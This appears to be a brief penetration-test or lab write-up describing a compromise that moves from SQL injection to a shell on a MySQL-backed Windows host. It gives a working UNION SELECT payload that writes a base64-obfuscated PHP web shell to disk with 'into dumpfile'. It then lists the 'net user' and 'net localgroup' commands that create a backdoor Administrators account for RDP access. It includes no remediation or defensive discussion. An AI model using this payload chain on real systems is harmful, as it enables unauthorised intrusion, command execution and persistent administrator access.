SQL Injection & Remote Code Execution [MySQL]

We use sqlmap to verify which revealed that the parameter has a sql injection vulnerability.

we can use sql injection to create a file by use into dumpfile and make a simple backdoor with base64.

system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7
y=1') UNION ALL SELECT NULL,...,NULL,”<?php eval(base64_decode(‘c3lzdGVtKCRfR0VUWyJjbWQiXSk7’)); ?>”,...,NULL into dumpfile 283shell.php -- -

we can access to the backdoor and execute “whoami” command.

Then, using the net user command, we create an account to use RDP.

net user sa *password* /add

and make sa account to Administrators localgroup

net localgroup Administrators sa /add

login RDP with our credentials.

Finally, we are able to log in to RDP.